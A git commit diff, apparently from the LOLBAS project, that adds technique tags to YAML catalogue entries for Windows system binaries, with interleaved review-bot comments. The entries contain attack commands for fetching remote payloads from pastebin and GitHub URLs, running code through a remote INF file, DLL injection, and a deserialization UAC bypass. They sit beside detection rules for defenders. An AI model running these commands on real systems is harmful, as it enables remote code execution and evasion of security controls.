Adding tags (closes #9, #318) (#362)

* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
Wietze 2024-04-03 16:53:36 +01:00 committed by GitHub
parent a945bac6be
commit ebbf08ec4d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
65 changed files with 229 additions and 66 deletions


@ -20,6 +20,7 @@ jobs:
mv yml/OSBinaries yml/Binaries mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts mv yml/OSScripts yml/Scripts
rm -r yml/HonorableMentions
- name: Deploy to LOLBAS-Project.github.io repo - name: Deploy to LOLBAS-Project.github.io repo
uses: peaceiris/actions-gh-pages@v3 uses: peaceiris/actions-gh-pages@v3
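Review bot: `rm -r yml/HonorableMentions` in the deploy step will fail the whole job if that directory is ever absent from the checkout, because GitHub Actions runs `run` steps under `bash -e` by default. If the goal is only to keep HonorableMentions out of the published site, `rm -rf yml/HonorableMentions` (or `[ -d yml/HonorableMentions ] && rm -r yml/HonorableMentions`) keeps the deploy robust, and a one-line comment saying why that folder is excluded would save the next maintainer a guess.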


@ -57,6 +57,14 @@ mapping:
"OperatingSystem": "OperatingSystem":
type: str type: str
required: true required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path": "Full_Path":
type: seq type: seq
required: true required: true
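Review bot: the key pattern `regex;(^[A-Z])` in the new `Tags` mapping only checks that a tag key starts with a capital letter, so any capitalised key with any string value validates; the rest of this commit uses a small fixed vocabulary (Execute, Download, Input, Type, Application), so enumerating those keys explicitly, or restricting values with `enum`, would keep tag-based filtering on the site consistent. Also, unlike the sibling fields shown here, `Tags` has no `required:` line at all; an explicit `required: false` would document that it is optional.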


@ -13,6 +13,8 @@ Commands:
Privileges: Required privs Privileges: Required privs
MitreID: T1055 MitreID: T1055
OperatingSystem: Windows 10 1803, Windows 10 1703 OperatingSystem: Windows 10 1803, Windows 10 1703
Tags:
- Key1: Value1 # Optional field for one or more tags
- Command: The second command - Command: The second command
Description: Description of the second command Description: Description of the second command
Usecase: A description of the usecase Usecase: A description of the usecase
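Review bot: the template comment `# Optional field for one or more tags` does not tell contributors which keys and values are accepted, and the schema only requires a capitalised key. Listing the vocabulary this commit introduces in the comment (for example `- Execute: DLL`, `- Download: INetCache`, `- Input: INF`) would stop new entries drifting into near-duplicates such as `Exec` or `Dll`.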


@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-12-02 Created: 2020-12-02
Commands: Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Detection: Detection:
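Review bot: the rewritten Description drops the exact on-disk location `C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>`, and the new `Download: INetCache` tag does not carry it; for this binary the cache is package-specific rather than the generic INetCache folder, which is exactly what someone triaging a host for the dropped file needs. Keep the path in the Description, or move it to an `IOC` under Detection, rather than losing it to the tag.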


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Server 2022 OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files Description: Downloads text formatted files
Usecase: Download scripts, webshells etc. Usecase: Download scripts, webshells etc.
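Review bot: the new `Execute: DLL` block tags only the first certoc command; the `-GetCACAPS` download command that follows stays untagged, and the hunk headers (-11,6/+11,8 then -21,8/+23,6) leave the same four-line gap between the hunks, so no Tags block was added for it further down. Other download entries in this commit receive a `Download:` tag; either tag this one as well or note why it is skipped.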
@ -21,8 +23,6 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\certoc.exe - Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe - Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
- IOC: Process creation with given parameter - IOC: Process creation with given parameter
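Review bot: dropping the empty `Code_Sample:` / `- Code:` stub is good cleanup, but the same removal is repeated across several files in this commit while the schema hunk only shows the `Tags` addition; confirm that `Code_Sample` is not `required: true` in the schema, otherwise these files will stop validating in CI.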


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe


@ -12,12 +12,14 @@ Commands:
MitreID: T1567 MitreID: T1567
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload - Command: ConfigSecurityPolicy.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe


@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.002 MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\control.exe - Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe - Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml


@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine. Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file. Usecase: Download and compress into a cab file.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: c:\windows\system32\diantz.exe - Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe - Path: c:\windows\syswow64\diantz.exe


@ -11,11 +11,11 @@ Commands:
Privileges: DNS admin Privileges: DNS admin
MitreID: T1543.003 MitreID: T1543.003
OperatingSystem: Windows server OperatingSystem: Windows server
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path - IOC: Dnscmd.exe loading dll from UNC/arbitrary path


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe
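Review bot: the second eventvwr command gets only `Application: GUI`, yet its Description says the technique is .NET deserialization of the `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file, which is the kind of attacker-controlled input this commit tags elsewhere as `Input: Custom Format` (InstallUtil). If tags are meant to support filtering by technique, adding that tag here keeps the vocabulary consistent; as it stands, a `GUI` tag says nothing a defender could act on.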


@ -28,8 +28,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml


@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path - IOC: Extexport.exe loads dll and is execute from other folder the original path


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream. Usecase: Extract data from cab file and hide it in an alternate data stream.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: Copy the source file to the destination file and overwrite it. Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav Usecase: Download file from UNC/WEBDav


@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-03-05 Created: 2020-03-05
Commands: Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection: Detection:
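Review bot: the shortened Description loses not only the two candidate directories (`%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>` and the `\IE\` variant) but also the on-disk naming pattern `<FILENAME>[1].<EXTENSION>`, which is what a file-event rule or forensic triage would key on; `Download: INetCache` is too coarse to recover either. Suggest keeping the pattern in the Description or adding it as an `IOC` under Detection.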


@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
@ -18,13 +21,18 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe https://example.com/payload - Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
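Review bot: `Input: Custom Format` is attached to the `/U AllTheThings.dll` command, but that command's Description only says "Execute the target .NET DLL or EXE" and never states what custom format is meant, so a reader cannot tell what the tag refers to. Either spell out the expected input in the Description or keep the entry at `Execute: DLL` only.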


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: jsc.exe /t:library Library.js - Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
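Review bot: `Execute: WSH` does not fit jsc.exe: the commands here compile JavaScript source with the JScript.NET compiler (`jsc.exe /t:library Library.js` producing Library.dll, per the Description) and nothing in the entry runs Windows Script Host. A tag that describes compilation, in the same style as the `Type: Compression` tag used elsewhere in this commit, would be more useful to someone filtering for script-host abuse than a WSH tag that will produce false hits.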


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream Usecase: Hide data compressed into an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file. Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file Usecase: Download file and compress into a cab file
@ -25,11 +29,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.013 MitreID: T1218.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process Usecase: Inject dll file into running process
@ -18,11 +20,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation - IOC: mavinject.exe should not run unless APP-v is in use on the workstation


@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj - Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters Usecase: Execute project file that contains XslTransformation tag parameters
@ -32,6 +34,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections Usecase: Bypass command-line based detections


@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
